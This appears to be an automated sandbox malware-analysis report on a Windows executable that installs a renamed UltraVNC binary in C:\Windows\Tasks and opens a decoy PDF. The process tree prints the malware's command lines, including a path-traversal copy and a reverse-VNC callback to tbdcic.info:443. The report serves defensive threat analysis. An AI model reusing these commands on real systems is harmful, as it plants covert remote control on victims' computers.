Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T8xrZb7nBL.exe

Overview

General Information

Sample name:T8xrZb7nBL.exe
renamed because original name is a hash value
Original sample name:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e.exe
Analysis ID:1579878
MD5:1677bd5b561b890396ae1816066ca481
SHA1:9ba4b30a162a261b27397bc1dc3736b94b786f65
SHA256:d9c7850bde98f2a2cb586b482efd8ff0b6c959ce71f9db699a7b457d5daf5f9e
Tags:exetbdcic-infouser-JAMESWT_MHT
Infos:

Detection

UltraVNC
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected UltraVNC Hacktool
AI detected suspicious sample
Contains VNC / remote desktop functionality (version string found)
Contains functionality to register a low level keyboard hook
Drops executables to the windows directory (C:\Windows) and starts them
Sigma detected: Execution from Suspicious Folder
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Suspicious UltraVNC Execution
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Command Line Path Traversal Evasion Attempt
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Process Start Locations
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes

Classification

Process Tree

  • System is w10x64
  • T8xrZb7nBL.exe (PID: 7828 cmdline: "C:\Users\user\Desktop\T8xrZb7nBL.exe" MD5: 1677BD5B561B890396AE1816066CA481)
    • cmd.exe (PID: 7924 cmdline: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7980 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 9655269573 9655269573.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8036 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 3889122.Khe9oLY 3889122.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8092 cmdline: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8144 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • Acrobat.exe (PID: 8188 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 5544 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 2300 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1876 --field-trial-handle=1608,i,4882657018283466900,1351896089500811277,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • timeout.exe (PID: 7208 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • taskkill.exe (PID: 7608 cmdline: taskkill /f /im browser_sn.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
      • timeout.exe (PID: 1296 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 4568 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 4508 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • browser_sn.exe (PID: 7844 cmdline: C:\Windows\Tasks\browser_sn.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 2056 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • browser_sn.exe (PID: 6020 cmdline: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
      • timeout.exe (PID: 5844 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 6888 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • cmd.exe (PID: 7100 cmdline: cmd /c "C:\Windows\Tasks\3889122.cmd" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • timeout.exe (PID: 5992 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • taskkill.exe (PID: 2788 cmdline: taskkill /f /im browser_sn.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • timeout.exe (PID: 6340 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • browser_sn.exe (PID: 5252 cmdline: C:\Windows\Tasks\browser_sn.exe MD5: 749B3A68B9C5325D592822EE7C2C17EC)
        • timeout.exe (PID: 6720 cmdline: timeout /t 8 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
        • browser_sn.exe (PID: 6516 cmdline: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443 MD5: 749B3A68B9C5325D592822EE7C2C17EC)
        • timeout.exe (PID: 7012 cmdline: timeout /t 4 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • timeout.exe (PID: 5592 cmdline: timeout /t 600 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Windows\Tasks\browser_sn.exeJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
    C:\Windows\Tasks\Xv6Ya.d8LhTJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
      C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Xv6Ya.d8LhTJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
          00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
            0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
              00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                  Click to see the 19 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  34.0.browser_sn.exe.7ff6c2b80000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                    23.0.browser_sn.exe.7ff6c2b80000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                      27.2.browser_sn.exe.7ff6c2b80000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                        36.0.browser_sn.exe.7ff6c2b80000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                          34.2.browser_sn.exe.7ff6c2b80000.0.unpackJoeSecurity_UltraVNCYara detected UltraVNC HacktoolJoe Security
                            Click to see the 3 entries

                            Sigma Signatures

                            System Summary

                            barindex
                            Sigma detected: Execution from Suspicious Folder
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Windows\Tasks\browser_sn.exe, CommandLine: C:\Windows\Tasks\browser_sn.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8092, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe, ProcessId: 7844, ProcessName: browser_sn.exe
                            Sigma detected: Files With System Process Name In Unsuspected Locations
                            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 8092, TargetFilename: C:\Windows\Tasks\conhost.exe
                            Sigma detected: Suspicious UltraVNC Execution
                            Source: Process startedAuthor: Bhabesh Raj: Data: Command: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, CommandLine: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, CommandLine|base64offset|contains: yr, Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8092, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe -autoreconnect -id:user-PC_Jd0Qd -connect tbdcic.info:443, ProcessId: 6020, ProcessName: browser_sn.exe
                            Sigma detected: Potential Command Line Path Traversal Evasion Attempt
                            Source: Process startedAuthor: Christian Burkard (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\T8xrZb7nBL.exe", ParentImage: C:\Users\user\Desktop\T8xrZb7nBL.exe, ParentProcessId: 7828, ParentProcessName: T8xrZb7nBL.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7924, ProcessName: cmd.exe
                            Sigma detected: Suspicious Copy From or To System Directory
                            Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\T8xrZb7nBL.exe", ParentImage: C:\Users\user\Desktop\T8xrZb7nBL.exe, ParentProcessId: 7828, ParentProcessName: T8xrZb7nBL.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\", ProcessId: 7924, ProcessName: cmd.exe
                            Sigma detected: Suspicious Process Start Locations
                            Source: Process startedAuthor: juju4, Jonhnathan Ribeiro, oscd.community: Data: Command: C:\Windows\Tasks\browser_sn.exe, CommandLine: C:\Windows\Tasks\browser_sn.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Tasks\browser_sn.exe, NewProcessName: C:\Windows\Tasks\browser_sn.exe, OriginalFileName: C:\Windows\Tasks\browser_sn.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 9655269573.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8092, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\Tasks\browser_sn.exe, ProcessId: 7844, ProcessName: browser_sn.exe

                            Suricata Signatures

                            No Suricata rule has matched

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            AI detected suspicious sample
                            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.2% probability
                            Source: T8xrZb7nBL.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: Binary string: conhost.pdbUGP source: T8xrZb7nBL.exe, 00000000.00000003.1421234001.0000000002754000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
                            Source: Binary string: conhost.pdb source: T8xrZb7nBL.exe, 00000000.00000003.1421234001.0000000002754000.00000004.00000020.00020000.00000000.sdmp, uqVb3.kkb9h.2.dr, uqVb3.kkb9h.0.dr, conhost.exe.8.dr
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00403387 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_00403387
                            Source: C:\Users\user\Desktop\T8xrZb7nBL.exeCode function: 0_2_00402EE6 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402EE6
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BAC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,23_2_00007FF6C2BAC210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2C3A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,23_2_00007FF6C2C3A228
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B85910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,23_2_00007FF6C2B85910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6C2BA6DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BAC210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,27_2_00007FF6C2BAC210
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2C3A228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,27_2_00007FF6C2C3A228
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2B85910 GetModuleFileNameA,FindFirstFileA,SendMessageA,FindNextFileA,FindClose,27_2_00007FF6C2B85910
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 27_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,27_2_00007FF6C2BA6DD1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2BA6DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,23_2_00007FF6C2BA6DD1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                            Source: C:\Windows\Tasks\browser_sn.exeCode function: 23_2_00007FF6C2B8C390 send,recv,23_2_00007FF6C2B8C390
                            Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
                            Source: global trafficDNS traffic detected: DNS query: tbdcic.info
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                            Source: 77EC63BDA74BD0D0E0426DC8F80085060.14.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://forum.uvnc.com
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://java.sun.com/products/plugin/index.html#download
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ocsp.thawte.com0
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.0000000002589000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002931000.00000004.00000020.00020000.00000000.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1423232596.000000000257B000.00000004.00001000.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002923000.00000004.00000020.00020000.00000000.sdmp, T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000000.1523669185.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609590258.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3281159795.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778706674.00007FF6C2DFC000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://www.uvnc.com
                            Source: T8xrZb7nBL.exe, 00000000.00000003.1422930123.0000000002758000.00000004.00000020.00020000.00000000.sdmp, browser_sn.exe, 00000017.00000000.1523572446.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000017.00000002.1679329166.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000000.1606099085.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 0000001B.00000002.1609390889.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000000.1696648797.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000022.00000002.3280939935.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000002.1778555450.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, browser_sn.exe, 00000024.00000000.1776497987.00007FF6C2C59000.00000002.00000001.01000000.00000007.sdmp, Xv6Ya.d8LhT.2.dr, browser_sn.exe.8.dr, Xv6Ya.d8LhT.0.drString found in binary or memory: http://www.uvnc.comopenhttp://forum.uvnc.comnet
                            Source: 2D85F72862B55C4EADD9E66E06947F3D0.14.drString found in binary or memory: http://x1.i.lencr.org/
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
